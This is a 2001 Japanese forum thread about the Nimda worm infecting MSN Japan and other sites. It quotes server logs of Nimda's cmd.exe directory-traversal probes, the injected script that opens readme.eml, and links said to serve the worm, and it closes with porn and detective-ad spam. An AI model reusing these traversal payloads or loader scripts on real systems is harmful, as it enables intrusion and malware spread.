MSNでウイルス感染！？

ニュー速板では、あきらかにウイルスだと言う人も
出てますが、どうなんでしょう？

関連スレ
MSNにウィルス添付？
http://news.2ch.net/test/read.cgi?bbs=news&key=1000822776

http://www.msn.co.jp
を開くとreadme.exeというファイルがDLするようになってるそうです。

MSNがやられましたｗ
topを読むと送られてきます。
http://www.msn.co.jp/readme.eml

おいおい、古い穴狙ってるな

emlから直接Base64の部分抜き出してデコードしてみたけど、
なんでこのファイル、こんなアイコンなんだ。

つーか普通にレスしちゃったけど、>>3のリンクはIEにパッチ
当ててない奴はまずいだろ。

>>5
あ、ごめん。ネスケなので気が付かなかったー。

http://www.mv-tohoku.co.jp/
http://www.prland.co.jp/

ここも同じ現象らしいよ。

ついでにバイナリエディタで覗いて見たけど、こいつも
Admin.dllとか言ってるな。最近はさすがにCodeRedスレ
見てなかったから知らんけど、そこらへんの新種が関係
してんのかね

MIMEのデコードが上手くいかない(;´Д`)
readme.exeのみのヘッダ教えてﾁｮ

ということで、CodeRedスレの人間に聞いた方が早そうだな。寝よ

http://210.150.177.216/
ここもな。

>>9
ん？readme.exeのみのヘッダ？

>>9
base64デコーダを使え。

>>2,7
IIS使う馬鹿に何が提案できるんだ

>>12-13
RarUty使ってるのだが、base64として認識してくれない(;´Д`)

寝ようと思ったけどまだ1時にもなってないのか。
見直してみたけど、やっぱりtftpとかも書いてあるわ。

128 名前：　 投稿日：01/09/19 00:40 ID:KLLLh/gg
突然*.emlファイルが数千作成され、エクスプローラー開くと空き要領が5MB/secくらいの
スピードで減っていった。LANでつないでいるリブレットも同時進行(^^;

>>17
実行したんかい（ｗ

それにしても、「不正なMIMEヘッダを含む〜」とCodeRedの
合作かな。なんか面白みないね

ワシもバイナリ観察ちゅう。いろいろ手が込んでますな。
しかし>>17のように実行は出来ないｗ

新種ウイルスという話になってる＜ニュース速報

やっぱ、ここで、話題になってましたか・・・・

実は、実行しちゃいました＞＜

readme.exeですが、
concept virs (CV) v5
って文字列が含まれてます。(TT)

concept virsをちょっと、調べてみたのですが、
英語版wordに感染するマクロウィルスらしいです。

ああ、VMwareのバーチャルマシン上で実行しようとしたら、
何日か前に消しちまったんだった。残念。まあ挙動はバイナリ
みるだけでほとんど書いてあるような気もするが。

21です。

ニュース速報って、どこの、ニュース速報？＞２０

>>23
あ、ややこしい書き方でｽﾏｿ、ココ（2ｃｈ）です。

対策されたみたいです、もう開きません

ん？ちと待てよ。これって今度は無差別にこのemlを
送信するわけか？だとしたらトラフィックがまた・・・。
一個76.6KBのファイルをガンガン送られたらかなわんな

>>17
その128、俺。

>>27
ネットワークの方はどうなってる？パケット送りまくり？

>>28
Librettoとラブコールしまくりだった。

該当バグ。IE5.5と5.01だけらしいです。それ以前以後のIEやネスケには無関係(らしい)
http://www.microsoft.com/JAPAN/support/kb/articles/JP290/1/08.htm

ん？するとバックドアで入ってweb閲覧者にも送りつけて繁殖？
IE5.01〜5.5限定とはいえ被害が広がるねえ。

>>29
そうか、じゃあ後は自分で解析するのも面倒っつーか
意味ないからCodeRedスレのログでも読むかな。

速報板のスレ。
http://news.2ch.net/test/read.cgi?bbs=news&key=1000822776&ls=50&nofirst=true

過去ログ読んできたけどまだそれほど情報でてないな。
１のスレも読んでみたけど、メディアプレイヤーが立ち上がる？
「不正なMIMEヘッダ〜」に加えて、「MediaPlayerのスキンファイル〜」
の穴も突こうとしてんのかね。出遅れたからわからん。
CodeRedスレの人間教えれ

http://www.trusecure.com/html/tspub/hypeorhot/rxalerts/tsa01024_cid177.shtml
かなぁ。

詳細はここで。
http://memo.st.ryukoku.ac.jp/archive/200109.month/thread.html

nimda？

今日は夜から、なんかネットが重いなって思ってたけど、
こいつがでかいファイルを撒き散らしてたわけね

>>35
サンクス、ざっと読んできた。また祭りか？とか思ってたけど、
洒落にならん・・・16種類。しかも良く考えたら「不正なMIME〜」は
IEだけじゃなく、OutLookもか・・・

Concept Virus(CV) V.5, Copyright(C)2001 R.P.China
って書いてあるよ？

でかいって言っても高々79261バイトじゃないのｗ

>>40
無差別に撒き散らすとしたら十分すぎるほどでかい

>>40
認識甘すぎ・・・・

すまん。鬱だ寝よう。

>>43
まぁまぁ、ドンマイドンマイ

それにしても、こんどのコードネームは Nimda か

つーかドンマイ言ってる場合じゃなかった。またも
ARP Floodが〜。1分にARPだけで1025パケット・・・

readme.exeを実行して、ブルーなので寝ます。
はぁ〜

実行したらexplorer.exeが落ちてﾜﾄｿﾝ博士が反応した
ﾒﾓﾘﾘﾌﾚｯｼｭするには便利なｱｲﾃﾑだよ

ﾜﾗﾀ

しかし笑い事じゃない。どうでもいいけどこのreadme.exe、
リソース覗いてみたらアイコンが５つ。・・・意味ないぞ

とりあえず今回もJ-COM内からのアタックがガンガン来てる
上にARPの数はさらに増えつつある。とりあえずJ-COMに
メール出しとくか。

　

http://www.symantec.co.jp/region/jp/sarcj/data/w/[email protected]
結局、脆弱性”Unicode Web Traversal”のパッチは無し？
ってことは、IIS全部感染対象？

URLScanしか方法無いのかなぁ。
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20010914/1/

しゃれにならんねえ





ﾜｼｮ-ｲ

ぱっち。
http://www.microsoft.com/japan/technet/security/prekb.asp?sec_cd=MS00-078

ﾜｹ ﾜｶ ﾗﾝ

まだ読んでないけど、
Scary Hybrid Internet Worm Loose
http://wired.com/news/technology/0,1282,46944,00.html

>>54
Nimdaは、先週起こったテロとは関係ないっちゅーことやろ

感染サイト(^^;
http://search.fresheye.com/?kw=readme.eml&term=monthly
今日の昼頃には感染サイトが爆発するでしょう。

シマンテックの解析が進んでるねぇ。凄い凄い。
がんばれしまんてくー。

これってさぁ、「ウチはApache for Winだから関係ないもーん」とか
思ってても、メールから感染したら、やっぱwebページが改竄されるのかなぁ。

>>58
感染したPC側はサーバーへのアタックもやるのかな。
それによると思う。
同じウィルスの感染手段が異なるだけのものだとすれば、
Webも改竄されるのでは。

このワーム絶対ヤバイよ、、。どうも>>59っぽいし。

そういえば
http://www.msn.co.jp/
ふっかつしないね、、、。

複数の感染方法を持ってるのかよ。

http://www.mv-tohoku.co.jp/
http://www.prland.co.jp/

このサイトをクリックしたらPCがバリバリバリバリいうようになっちゃったよぉ〜。
もう30以上もつづいているよ。。。
ファイルのダウンロード画面が一瞬出たんだけど、
保存するってやらなくても落ちて来ちゃうの？
対処法はどうすればいいの？

ぁぁぁぁぁああああパニックだよぉぉぉぉぉおおおおお！

Windowsファイル保護っていう画面が出て
Windowsを正しく動作するための必要なファイルが認識できない
バージョンのファイルに置き換えられています。システムの
安定を維持するために、これらのファイルを元のバージョンに
復元する必要があります。

Wndows2000 Professional CD-ROMを挿入してください。

ってなるんだけど、ただCDを入れれば勝手に処理してくれるのんですか？

Un Installなんとか
Map....

っていうお知らせ画面がでてきました。

駆除方法が確立されるまで、手出さないほうがいいんじゃない？

あー、あんなの見てなくてよかった。
オレ、msnなんて昔から見たことないから・・・・・
あの錆、めちゃ遅いからね。

いまだに、立ち上げと同時にmsnが表示されたままの人が
多いようだし・・・・

>>63
いやいや。
しばらくすると、各社から修復方法が発表になると思うので、
それまでは、予備のＰＣでやっていた方がいいと思う。

静かです、、すごく静かになりました。。。。
なんだかPCの中にとんでもない悪者が潜んでいそうでとてもコワイです。

このemlファイル使った穴を塞ぐパッチって、IE5.5SP2には
含まれてるよね？

ＩＰアタック来てますか？

まだ駆除方法は出てないわけだ？
ひっかっかっちゃったよヽ(´ー｀)ノ　実害出てないけどね。。
そのうちファイルあぼられたりするのかなあ？

>>70
昨日だけで34回きた

そうそう、各フォルダに009.emlとかいうファイルがいっぱいできてた。
ﾃﾞｽｸﾄﾌﾟﾝだけじゃなかったみたい(´Д｀)

どんな解説見てる？

これってアメリカの報復ﾊｶｰと関係あるのかなぁ？

ラウンジにサイト貼られてたから開けちゃったよヽ(;´ー｀)ノ
ファイルのバックアップとっといた方がいいかな？　 　 　

うちやられちゃったよ・・・。
http://mimizun.mine.nu/

ハードディスクいっぱいにしてくれました。一応、*.emlと*.tmp.exeを削除しました。
でもなぁNTsp6aのIISでSRPあてていたんだが・・・

もしかしたらファイル消されたかもしれない。C:\のファイルが。。
気のせいかもしれないけどね。あと.eml消せなくなってるよ？？
>>77
ご愁傷様。。なんか実害あった？ファイル消されたりするのかなぁ？
意味ないんじゃないの？？

ゴルァ、おれのサーバにアホみたいにきてるぞ。
CodeRedIIの比じゃないぐらいの割合で。

>69
　このemlファイル使った穴を塞ぐパッチって、IE5.5SP2には
　含まれてるよね
IE6,0はどうなんでしょうか？

新種ウイルス「Ｎｉｍｄａ」の感染拡大＝米司法長官
http://headlines.yahoo.co.jp/hl?a=20010919-00000116-jij-bus_all

　【シリコンバレー１８日時事】「Ｎｉｍｄａ（ニムダ）」と呼ばれる危険度の高い新種の
コンピューターウイルスが登場し、ウイルス対策会社などが注意を呼び掛けている。

　米ウイルス対策大手シマンテックによると、同ウイルスは、電子メールで届けられる添付
ファイル「ｒｅａｄｍｅ．ｅｘｅ」に潜み、これを利用者が不用意に開くことで感染する。
感染したコンピューターは、ウイルスメールを外部に発信。マイクロソフト製ウェブサーバー
ソフトを利用している他のコンピューターに対して同ソフトのセキュリティーホール
（欠陥）を狙った攻撃を仕掛ける。　（時事通信）[9月19日9時3分更新]

>>80
確かめてみたら5.5SP2にはばっちり含まれてた。
悪いんだが6.0はわからん。でも対策されてない気がする

http://help.msn.co.jp/notice.htm

このスレで言ってるのって
http://www.microsoft.com/japan/technet/security/prekb.asp?sec_cd=MS00-075
のことだよね。

これとCodeBlueって関係してんの？
ウチも昨日からアタック受けてるけどあれとMSNのは別物じゃないかな。

>マイクロソフト製ウェブサーバーソフトを利用している他の
^^^^^^^^^^^^^^^^
>コンピューターに対して同ソフトのセキュリティーホール

>（欠陥）を狙った攻撃を仕掛ける。（時事通信）[9月19日9時3分更新]
^^^^^^^^^

これって、損害賠償責任ないの？

210.91.45.224 - - [19/Sep/2001:10:03:44 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 233
210.91.45.224 - - [19/Sep/2001:10:03:50 +0900] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 214
210.91.45.224 - - [19/Sep/2001:10:03:57 +0900] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 214
210.91.45.224 - - [19/Sep/2001:10:04:05 +0900] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 214
210.91.45.224 - - [19/Sep/2001:10:04:10 +0900] "GET /scripts/..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 214
210.91.45.224 - - [19/Sep/2001:10:04:16 +0900] "GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 214
210.91.45.224 - - [19/Sep/2001:10:04:23 +0900] "GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 214
210.91.45.224 - - [19/Sep/2001:10:04:30 +0900] "GET /msadc/..%5c../..%5c../..%5c/..ﾁ../..ﾁ../..ﾁ../winnt/system32/cmd.exe HTTP/1.0" 400 205
210.91.45.224 - - [19/Sep/2001:10:04:38 +0900] "GET /scripts/..ﾁ../winnt/system32/cmd.exe HTTP/1.0" 400 205
HRS-MSG - - [19/Sep/2001:10:10:20 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 233
HRS-MSG - - [19/Sep/2001:10:10:22 +0900] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 214
HRS-MSG - - [19/Sep/2001:10:10:37 +0900] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 214
HRS-MSG - - [19/Sep/2001:10:10:41 +0900] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 214
HRS-MSG - - [19/Sep/2001:10:10:44 +0900] "GET /scripts/..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 214
HRS-MSG - - [19/Sep/2001:10:10:48 +0900] "GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 214
HRS-MSG - - [19/Sep/2001:10:10:51 +0900] "GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 214
HRS-MSG - - [19/Sep/2001:10:10:54 +0900] "GET /msadc/..%5c../..%5c../..%5c/..ﾁ../..ﾁ../..ﾁ../winnt/system32/cmd.exe HTTP/1.0" 400 205
HRS-MSG - - [19/Sep/2001:10:10:58 +0900] "GET /scripts/..ﾁ../winnt/system32/cmd.exe HTTP/1.0" 400 205
HRS-MSG - - [19/Sep/2001:10:11:01 +0900] "GET /sc?/c+dir HTTP/1.0" 404 214
HRS-MSG - - [19/Sep/2001:10:11:03 +0900] "GET /scripts/..?../winnt/system32/cmd.exe HTTP/1.0" 400 205
HRS-MSG - - [19/Sep/2001:10:11:06 +0900] "GET /scripts/..?../winnt/system32/cmd.exe HTTP/1.0" 400 205
HRS-MSG - - [19/Sep/2001:10:11:09 +0900] "GET /scripts/..5c../winnt/system32/cmd.exe HTTP/1.0" 404 214
HRS-MSG - - [19/Sep/2001:10:11:11 +0900] "GET /scripts/..5c../winnt/system32/cmd.exe HTTP/1.0" 404 214
HRS-MSG - - [19/Sep/2001:10:11:14 +0900] "GET /scripts/..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 214
HRS-MSG - - [19/Sep/2001:10:11:20 +0900] "GET /scripts/..%2f../winnt/system32/cmd.exe HTTP/1.0" 404 214

永遠に続く。重いわけだ。

米軍がやっとんとちゃうか？

感染したが、GoBackで昨日の午前中に戻したからたぶん大丈夫だろう。

PCとサーバの両方を狙う新種ワーム
http://www.zdnet.co.jp/news/0109/19/b_0918_01.html

>>82
ありがとうございます。
6.0から5.5にバージョンアップ？と思いつつIEのページからDLしようとしたら
最新バージョンがインストール済みでバージョンアップできませんですって。
こわいよー！

えっと。感染したのでいろいろ見てみたけど

ありとあらゆる実行ファイルにreadme.emlなる文字列が確認されたのでめんどいのでクリーンインストールします。。。
パッチあてめんどいんだよなぁ。

えっと、>>91はIISのサーバーの場合です。普通に見ているだけでは問題ありません。

>>91
GoBack入れとけば良かったのにな。
うちはGoBackで感染ファイルが根こそぎなくなったわ。よかったよかった。

おいおい、ニュース速報板に書き込むとアタックが来る。

>>90
6から5.5へは逝けません。6へは一方通行です。

MSN復活しとるな。。。
お詫びも警告もないな。。。

やっぱりな。。。。

http://headlines.yahoo.co.jp/hl?a=20010919-00000001-vgb-sci
複合的な攻撃、感染機能をもつウィルス　Nimda

Nimda＝ニダ？

なんて読むニダ

>>94 >>96
米軍の作戦の1つニダ

汚染源リスト
http://headlines.yahoo.co.jp/hl?a=20010919-00000002-vgb-sci

Lynxでiモードの方のページ見てたから気付かなかったけど、
ここのトップにNimdaの警告が貼ってあるね。気が利くな。
ちなみに「見ただけで感染」を防ぐだけじゃなく、パッチ当てた
ならメール経由でも防げるはず。まあまだメールで来た人はいない
みたいだけど。

>>94
あそこは、アクセスするだけでロクを取られているし、
そのログをハッキングしているやつがいるから要注意。

ニュース速報板に誰か書き込んでみた？
アタック来るよね？俺だけ？

どれ、試しに書きこんでみるか。黒氷でもアタック見える？

>>102
そうだよ。
あそこ、絶対にログが漏れているよ。

>>102
ＩＰさらせ。

emlファイルってどうやって消せばいいの？
2300個もあったよ。。。
右クリックで消そうとすると

ファイルを削除できません。送り側のファイルまたはディスクから読みとれません。

っていわれるし。
消せるファイルは削除するとなんか実行されてるみたいだし。。。

マジで恐いよ！！

The firewall has blocked Internet access to your computer (TCP Port 8081) from ton.2ch.net (64.71.133.114) (TCP Port 4103) [TCP Flags: S].
The firewall has blocked Internet access to your computer (TCP Port 9081) from ton.2ch.net (64.71.133.114) (TCP Port 4105) [TCP Flags: S].

とうとう、ここもだよ。

おいおい、早くワクチン作ってくれぇヽ(；´Д｀)ノ　

>>106
dosで消せ。

>>106
うちはけせたけど。。。NT ServerSP6a+SRP

f: del *.eml

でいいですか？

これみて。
http://www.ipa.go.jp/security/index.html

日本のお役所は、なーんも警告出してねーよ。
税金泥棒だな。

>>106
ファイルの検索で期間を指定して当格ファイルを選び出して削除。

DEL F:*.eml

ファイルの検索でひっかかったemlファイルを右クリックで
削除しようとすると警告ばってんがつくんですよ。。。

>>114
それだと友達から来て保存しているメールも削除されちゃうかもよ。

見つけたemlファイルを軽く一回クリックしただけでも
ファイルのダウンロードが始まるんですね。。。。
どうしよう。。。

http://210.135.182.178/
ここいくとreadme.exeが落とせる

>>117
パソコン買い換える。

emlファイルってどうやって検索するんですか？
ＨＤＤ感染したっぽいんですけど

誰かNimda専用スレ立ててくださいませ。こいつは酷い。
Ａｐａｃｈeのログが２分間隔くらいで
GET /scripts/..?../winnt/system32/cmd.exe HTTP/1.0
みたいなのばっかり、ログ見た時ぞっとしたよ。

cmd.exe ってウイルスですか？＞１２１

<html><body bgcolor=black><br><br><br><br><br><br>
<table width=100%><td><p align="center"><font size=7 color=red>fuck USA Government</font><tr><td><p align="center">
<font size=7 color=red>fuck PoizonBOx<tr><td><p align="center"><font size=4 color=red>contact:[email protected]</html>

<html><script language="JavaScript">window.open("readme.eml", null, "resizable=no,top=6000,left=6000")</script></html>

>>122 コマンドプロンプトです。ファイ名を指定して実行で試してみれば
わかりますが。

ファイ名Ｘ ファイル名。鬱。

ところで、こいつってＩＥコンポーネントブラウザ(cuamとか)ってどーなんだろ？

パッチ当ててなければ食らうだろうね。
メーラーも、IEコンポーネント使ってるやつなら危険

ニダスレぎぼーん
情報がなくって困ってます。
いまＩＩＳをスキャンしているのは、いけないページを見てしまった
クライアントという事でいいですか？
アパッチのｈｔｔｐドキュメントをSAMBAで共有してたら、やられちゃうん
でしょうか？defaunt.htmlだけが対象ならいいんだけど、index.htmlも
書き換えられるんだったら、自宅のもやばい・・・嫁のＰＣはＳＰなんて
あててないもん

>>128 感染ルートは１つじゃないです。
http://www.symantec.com/region/jp/sarcj/data/w/[email protected]

ＩＥ５．００ってやばいすか？
ＳＰ２って書いてあるんすけど

http://ton.2ch.net/test/read.cgi?bbs=sec&key=1000870301
ここでやろうぜ

お粗末msn　さらしあげ。

2001/09/18(23:15:46) W-SV 211.125.194.55 [80] 404 240 "GET /MSADC/root.exe?/c+dir HTTP/1.0"
2001/09/18(23:15:49) W-SV 211.170.249.153 [80] 404 250 "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0"
2001/09/18(23:15:54) W-SV 211.170.249.153 [80] 404 250 "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0"
2001/09/18(23:15:57) W-SV 211.125.194.55 [80] 404 250 "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0"
2001/09/18(23:15:58) W-SV 211.125.194.55 [80] 404 250 "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0"
2001/09/18(23:16:00) W-SV 211.170.249.153 [80] 404 264 "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
2001/09/18(23:16:00) W-SV 211.125.194.55 [80] 404 264 "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
2001/09/18(23:16:03) W-SV 211.103.80.185 [80] 404 263 "GET /scripts/..ﾁ../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
2001/09/18(23:16:05) W-SV 211.170.249.153 [80] 404 281 "GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
2001/09/18(23:16:13) W-SV 211.103.80.185 [80] 404 263 "GET /scripts/..ﾀ/../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
2001/09/18(23:16:14) W-SV 211.170.249.153 [80] 404 281 "GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"

昨晩から、ずっと・・・・・・・・・

http://help.msn.co.jp/notice.htm
ご質問とご回答
Q.自分の会社のサーバーが被害にあった。MSN からの攻撃が原因ではないか。

A. MSN ではサーバーが直接マイクロソフト社外のサーバーに対して影響を及ぼしたことはないと考えています。
MSN のインターネット上に開いたサーバーは、サーバー機能ではなくそのコンテンツファイルが 9/18 の夜 11 時以降
1 時間ほど感染した状態にありましたが、これにより影響を受けたのは直接このサーバーにアクセスした利用者の
コンピュータになります。なお、利用者のコンピュータが感染するには、ブラウザのバージョンなどいくつかの条件が
そろった場合に限られます。

普段寛容な俺もMSNのこのコメントには殺意を覚えた。
とくに「〜ないと考えています。」ってところ。

>>90 他
「不適切な MIME ヘッダーが原因で Internet Explorer が電子メールの添付ファイルを実行する」（本日更新）
　http://www.microsoft.com/japan/technet/security/prekb.asp?sec_cd=MS01-020

> 注 : ご使用の Internet Explorer を Internet Explorer 5.5 Service Pack 2 (SP2)、
> Internet Explorer 5.01 Service Pack 2 (SP2) または Internet Explorer 6 に
> アップグレードすることによっても、この問題を修正することができます。

だってさ ヽ(´ー｀)ノ

ってーか、パッチ配布してる大元が、、、何でその穴使ったウイルスに
感染するかね。。。my糞。

やっぱ。カネの亡者の会社だけあるな。

どうしてみんなは
「Windowsが欠陥品である」
と言うことに気がつかない？

見ただけで勝手に何かを実行するなんて言う構造は
根本的に間違い。

こんな基地外であるMicro$oftは、早く潰れて下さい。
1番悪いのは、ビルゲイツです。
商売以外にももうちょっと頭使って下さい(藁

で2番目にに悪いのが、ウィルス作成者。
いくらWindowsがショボイと言っても、
そんなことやってはいけません。

3番目に悪いのは、それに気がつかずM$製品を使う
厨房ユーザー

感染したmsnは、もちろん消防(ププププ

>>139
いつかヴァスコダ・ガマのように
いつかヴァスコダ・ガマのように
いつかヴァスコダ・ガマのように
いつかヴァスコダ・ガマのように
いつかヴァスコダ・ガマのように
…

コピペ厨ウザイ

>>139
自分で工夫したり探求する能力がないんだよ、
｢周りが使っているから｣と言うだけでそれ以上の
判断止めちゃう奴が多いからね。
大丈夫、たとえ欠陥有っても気がつかないから。

要するにMSの問題じゃなくてユーザーの問題。
便利な部分だけ受け取って面倒な部分は他人任
せにしたり目を背け続けた結果だよ。こういう
人たちはどんなOS使っても同じね。

>>142
周りが使ってるからというより、あらゆるソフトが手に入りやすいから
ってのが主な理由でしょ。

始めっから入ってるからだろう，ソフトがどうかなんて考えて
無い奴が多いと思うが

すぐに穴空いたり、変なスクリプトやウイルス出てきて
飽きないよ。WIN。
パッチ当てて安心するだけじゃなく、そのバグ突いた不
正スクリプト探し当てるのも楽しいし。
ただ、そのバグ発見した本人が公開前にMSに警告したに
も関わらず、パッチ出なくて業を煮やして公開に踏み切
ってるのは企業態度として頂けない。

>>142
excel と word を使ってるだけだろ，ほとんどの奴は

いままでにIEから重要なエラーとか言うので、その事を管理側に教えた事ある人います？
これでこのエラーでたの2度目なんだけど、送信しなかった。

Outlookのプレビュー機能だけは即刻廃止させた方がいいだろうな

>>142
UNIXとかならそういう主張も説得力あるけど、
WINDOWSは知識持ってる奴だけが使う物じゃないからね・・・
XP祭りなんかやってる場合かM＄

>>142
いま「ＩＴ講習」とかいって、６０歳過ぎたじーちゃんばーちゃん
だってＯＵＴＬＯＯＫやＩＥ使ってネットしているよ。っていうか、
それ以外の方法を知らない。
アップグレードの仕方は教えているのかな。心配。

>>150
アップグレードなんか教えてないね。
使うだけでせーいっぱいなのに、どーやって教えるんだ？
使えればいいのであって、それ以上のことは学ぼうとしないよ。
ジジババだけじゃなく、たいていのWinユーザーがそうだと思うよ。
痛い目に会わないとわからないんだよ。
感染しててもわからないに、１００００００ペリカ。

おれも１０年以上の昔にブートセクターウィルスにやられてから、いろいろと学んだよ。

「転んでも泣かない！」

>>150
そういえばPCショップで老夫婦がシンクパッド持ってきて
店員に｢ああ、これなら再インストールで直りますよ｣と
あっさり言われて｢さい･･･なんとか？｣とつぶやいて
立ち尽くしていたのを思い出す。

インターネットボタンとかテレビ録画だとかいかにも簡単
そうに宣伝しておいてリカバリーになったとたんDOS画面
だもんな。そんなんだったら｢バックアップボタン｣とか
｢再インストール｣ボタンでも付けた方がユーザー喜ぶよね。

IEの方から「重要なエラー」とかいうダイアログが出たんですけど、なに？
出た人いますか？

>>153
出た出た。
それ、送信しないほうがいい。
ＭＳに情報もっていかれる。

>>154さん
送信しちゃったよ。。。
どうなるのかな？
俺のPCなんてろくなものは言ってないのに。。。

申し訳ありません、ここで言うＭＳとは何でしょか？

>>156ネタだよな？
しかしWINは大変だな。LINUX厨房の俺には関係ないが

すみません、正気なんです。あわわわわぁ・・・

>>156
MS=M$

確かおとといの夜だったかな・・・？
ここで『MSNがウィルスばら撒いてる』っての見て、
好奇心で見に行ってしまった・・・バカだ。
幸いにも『ページが表示できません』で繋がらなか
ったみたいだが・・・今考えるとぞっとする。

>>159
Ｍ＄・・・・・

・・・・・・・すみません、厨房です。
初心者板逝って来ます。

漏れもそう。
ニュースサイトで知って、ホントかよ・・・
と思って２ちゃんで知ったアドレスにレッツアクセス！

昨日から大惨事。
自業自得か・・・・

>>161
マイクロソフト以外に何があるってんだ？

http://210.135.201.16/

>>156
某シュレッダー大手

>>163
マイクロソフト・・・うわぁ、アホだ俺・・・。
ご迷惑おかけしました、やっぱ逝ってきます。

騙されてるよ、モビールスーツに決まってるジャン
みんな初心者をもてあそんじゃ可哀相だよ。

いやいや。
msとは、マンコ・セクースのことだよ。

モロ、無修正画像サイト発見！

http://www.sex-jp.net/dh/01/
http://www.sex-jp.net/dh/02/
http://www.sex-jp.net/dh/03/
http://www.sex-jp.net/dh/04/

[email protected]

www.hnmc.edu.cn.
211.67.232.4 Fri Sep 21 19:41:38 2001 error File does not exist: /home/httpd/htdocs/c/winnt/system32/cmd.exe
www.hnmc.edu.cn.
211.67.232.4 Fri Sep 21 19:41:40 2001 error File does not exist: /home/httpd/htdocs/d/winnt/system32/cmd.exe
www.hnmc.edu.cn.
211.67.232.4 Fri Sep 21 19:41:42 2001 error File does not exist: /home/httpd/htdocs/scripts/..%5c../winnt/system32/cmd.exe
www.hnmc.edu.cn.
211.67.232.4 Fri Sep 21 19:41:44 2001 error File does not exist: /home/httpd/htdocs/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
www.hnmc.edu.cn.
211.67.232.4 Fri Sep 21 19:41:47 2001 error File does not exist: /home/httpd/htdocs/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
www.hnmc.edu.cn.
211.67.232.4 Fri Sep 21 19:41:52 2001 error File does not exist: /home/httpd/htdocs/msadc/..%5c../..%5c../..%5c/..ﾁ../..ﾁ../..ﾁ../winnt/system32/cmd.exe
www.hnmc.edu.cn.
211.67.232.4 Fri Sep 21 19:41:54 2001 error File does not exist: /home/httpd/htdocs/scripts/..ﾁ../winnt/system32/cmd.exe
www.hnmc.edu.cn.
211.67.232.4 Fri Sep 21 19:41:58 2001 error File does not exist: /home/httpd/htdocs/scripts/..ﾀｯ../winnt/system32/cmd.exe
www.hnmc.edu.cn.
211.67.232.4 Fri Sep 21 19:42:01 2001 error File does not exist: /home/httpd/htdocs/scripts/..ﾁ・./winnt/system32/cmd.exe
www.hnmc.edu.cn.
211.67.232.4 Fri Sep 21 19:42:10 2001 error File does not exist: /home/httpd/htdocs/scripts/..%5c../winnt/system32/cmd.exe
www.hnmc.edu.cn.
211.67.232.4 Fri Sep 21 19:42:16 2001 error File does not exist: /home/httpd/htdocs/scripts/..%2f../winnt/system32/cmd.exe

きまりきったアプリしか使わなくてアップデートもさほど必要じゃないってユーザ層に
システムやアプリはCD-ROM みたいな書きこみ不可能な媒体で動かす
マシン発売すりゃいいんだよ。
昔のワープロ専用機みたいに。
クラッシュの心配はほぼないし、ウイルス汚染もかなり減るだろ。
取り扱い簡単になるはず。

昔、それに似たようなパソコンが売られてたような、、
どうなんたんだろう？

確か勝手にパソコンがアップデートしてくれるマシン。
ユーザーは何もしなくてよかったと思う

トレンドマイクロのサイトに行って
オンラインで探したところ（無料）
７つの感染ファイルがみつかりました。
MSNのホームページから勝手にダウンロードされた
圧縮ファイルのようです。
削除したけど・・・もう大丈夫かな？

>>172
あはは！そりゃ良いや。メール、ブラウザ、オフィス、年賀状
位しか使ってないんだからな。

かんめーないけど
まきはらとさいとーがいんたいだってね

http://www.sponichi.co.jp/baseball/kiji/2001/09/22/01.html

PCにOS未搭載する。
BIOSがネット機能持て。boot時に選択メニュー(もちろんお気に入りのOS群)
がでる。ネットからOSを見つけてbootする。メーカーのServerでもいいし、その辺のユーザーPCの読込済みのでもいいじゃん。
OS部分は共有化だな。NapsterやWINMXみたいにさ。ついでにアプリも共有しちゃえ。
もはやHDDは自前のデータだけになり、寂しい俺としては40MBディスク復活希望。

ISPが10メガ用意しているので、お前はディスクも要らぬと 後ろから声がした。

ようするにロムブート。

意訳してロンブー

>>180
パソコンのネットワークカードに御茶目なプログラムが
乗ってて、電源入れたときにディスクが使えない　OR
使わないとしよう。　そうすっと、
「俺んち何もねーからアドレスくれYO!｣とか、
「次何したらいーかわかんねーからおせーて｣とか、
とにかく教えてクンモードになっちゃうのが”ろむぶー”
親切などぜう^H^H^H鯖が出てきてこんにちは、ぼっちゃん「あれせい。
これやる」と死ぬまで面倒見てやるってパターン。　うんDOZEだと、
Cドライブまでサーバから共有フォルダになってる
パターンだな。　終わり。

家電とか車なみに普及し、
ユーザがそういう範囲に広がるんなら
OSやアプリが書き換え不可能な媒体での運用
というマシンをメーカは真剣に考えるべきだろ。

家電や車をコントロールしてるソフトウエア
EPROMその他を媒体としている。
　悪意のある部外者が悪意をもったさわり方をしたり
　未熟なユーザが誤操作をしても
媒体に書いてある内容が悪い改変を受けることは
まあないでしょう。

騙された・捨てられた・弄ばれた・相手に誠意がない・債権トラブル・不倫疑惑・証拠が欲しい・電話番号などから住所などの詳細を調べて欲しい・等など
